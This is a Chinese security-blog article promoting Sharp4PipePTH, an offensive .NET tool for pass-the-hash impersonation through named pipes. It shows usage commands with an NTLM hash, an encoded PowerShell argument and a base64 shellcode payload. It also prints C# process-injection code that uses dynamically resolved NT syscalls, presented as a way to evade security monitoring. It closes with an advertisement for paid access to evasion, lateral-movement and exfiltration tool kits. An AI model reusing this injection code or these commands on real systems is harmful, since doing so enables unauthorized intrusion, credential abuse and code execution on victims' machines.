01
阅读须知
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面
02
基本介绍
Sharp4PipePTH 是一个用于通过管道模拟和传递哈希值,从而实现以其他用户身份运行二进制文件的工具。这种技术被广泛用于渗透测试和内网攻击场景,通过传递哈希值而非明文密码来实现对目标系统的控制。该工具能够有效利用管道进行模拟,因此可以绕过某些安全检测机制。
03
使用方法
Sharp4PipePTH 提供了两种主要的运行方式,具体来说,可以通过命令行指定用户名、内网域的名称、哈希值以及要运行的二进制文件路径和参数来执行操作。
Sharp4PipePTH.exe username:Administrator domain:localhost hash:31d6cfe0d16ae931b73c59d7e0c089c0 binary:"C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"
另外一种可以通过指定用户名、内网域的名称、哈希值并传递Base64编码的Shellcode来执行命令。具体如下所示。
Sharp4PipePTH.exe username:Administrator domain:localhost hash:31d6cfe0d16ae931b73c59d7e0c089c0 shellcode:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY21kLmV4ZQA=
04
原理解析
在处理Shellcode的执行时,Sharp4PipePTH 首先通过以下代码将Base64编码的Shellcode转换为字节数组,然后在新线程中调用ImpersonateClient方法,执行模拟和代码注入操作
bool flag14 = shellcodegiven;
if (flag14)
{
byte[] shellcodebytes = Convert.FromBase64String(shellcode);
Thread t = new Thread(delegate()
{
PipeServerImpersonate.ImpersonateClient(pipename, binary, shellcodebytes, Args);
});
t.Start();
}
ImpersonateClient 方法是工具的核心,通过创建命名管道并将安全描述符设置为允许所有用户访问,从而实现客户端的模拟,具体代码如下
public static void ImpersonateClient(string PipeName, string Binary, byte[] shellcodebytes, string args)
{
PipeServerImpersonate.SECURITY_ATTRIBUTES securityAttributes = default(PipeServerImpersonate.SECURITY_ATTRIBUTES);
string pipename = string.Format("\\.\pipe\{0}", PipeName);
Console.WriteLine("Create Named Pipe: " + pipename);
PipeServerImpersonate.ConvertStringSecurityDescriptorToSecurityDescriptor("D:(A;OICI;GA;;;WD)", 1U, out securityAttributes.lpSecurityDescriptor, IntPtr.Zero);
IntPtr hPipe = PipeServerImpersonate.CreateNamedPipeW(string.Format("\\.\{0}", pipename), 1073741827, 0, 10, 2048, 2048, 0, ref securityAttributes);
}
在这个过程中,工具使用了多个NT API函数,通过动态获取系统调用的方式来分配内存、写入Shellcode、保护内存以及创建新线程来执行代码。
DynamicInvokation.Native.NTSTATUS statusresult = ntOpenProcess(ref hProcess, 2035711U, ref oa, ref ci);
stub = DynamicInvokation.DynamicGeneric.GetSyscallStub("NtAllocateVirtualMemory");
PipeServerImpersonate.NtAllocateVirtualMemory ntAllocateVirtualMemory = (PipeServerImpersonate.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(PipeServerImpersonate.NtAllocateVirtualMemory));
IntPtr baseAddress = IntPtr.Zero;
IntPtr regionSize = (IntPtr)shellcodebytes.Length;
statusresult = ntAllocateVirtualMemory(hProcess, ref baseAddress, IntPtr.Zero, ref regionSize, 12288U, 4U);
stub = DynamicInvokation.DynamicGeneric.GetSyscallStub("NtWriteVirtualMemory");
PipeServerImpersonate.NtWriteVirtualMemory ntWriteVirtualMemory = (PipeServerImpersonate.NtWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(PipeServerImpersonate.NtWriteVirtualMemory));
IntPtr buffer = Marshal.AllocHGlobal(shellcodebytes.Length);
Marshal.Copy(shellcodebytes, 0, buffer, shellcodebytes.Length);
uint bytesWritten = 0U;
statusresult = ntWriteVirtualMemory(hProcess, baseAddress, buffer, (uint)shellcodebytes.Length, ref bytesWritten);
stub = DynamicInvokation.DynamicGeneric.GetSyscallStub("NtProtectVirtualMemory");
PipeServerImpersonate.NtProtectVirtualMemory ntProtectVirtualMemory = (PipeServerImpersonate.NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(PipeServerImpersonate.NtProtectVirtualMemory));
uint oldProtect = 0U;
statusresult = ntProtectVirtualMemory(hProcess, ref baseAddress, ref regionSize, 32U, ref oldProtect);
stub = DynamicInvokation.DynamicGeneric.GetSyscallStub("NtCreateThreadEx");
PipeServerImpersonate.NtCreateThreadEx ntCreateThreadEx = (PipeServerImpersonate.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(stub, typeof(PipeServerImpersonate.NtCreateThreadEx));
IntPtr hThread = IntPtr.Zero;
statusresult = ntCreateThreadEx(out hThread, DynamicInvokation.Win32.WinNT.ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, hProcess, baseAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
通过这种方式,Sharp4PipePTH 成功将Shellcode注入到目标进程中,并实现了代码的远程执行,如下图所示。
综上,Sharp4PipePTH 常用于模拟不同用户的身份执行命令,如在渗透测试中通过哈希传递技术来绕过用户身份验证,执行特权命令。这种方式不仅可以隐蔽地执行操作,还能规避多种安全监控措施。工具已经打包在星球,感兴趣的朋友可以加入自取。
05
推荐阅读
从漏洞分析到安全攻防,我们涵盖了.NET安全各个关键方面,为您呈现最新、最全面的.NET安全知识,下面是公众号发布的精华文章集合,推荐大家阅读!
06
欢迎加入.NET安全星球
为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。 星球门票后期价格随着内容和质量的不断沉淀会适当提高,因此越早加入越好!
目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。
星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。
我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
我们还有一个会员专属的内部星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。
为了助力大家在2024国家级hvv演练中脱颖而出,我们特别整理出了一套涵盖dotNet安全矩阵星球的八大.NET相关方向工具集。
.NET 免杀WebShell
.NET 反序列化漏洞
.NET 安全防御绕过
.NET 内网信息收集
.NET 本地权限提升
.NET 内网横向移动
.NET 目标权限维持
.NET 数据外发传输
这些阶段所涉及的工具集不仅代表了当前.NET安全领域的最前沿技术,更是每一位网络安全爱好者不可或缺的实战利器。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...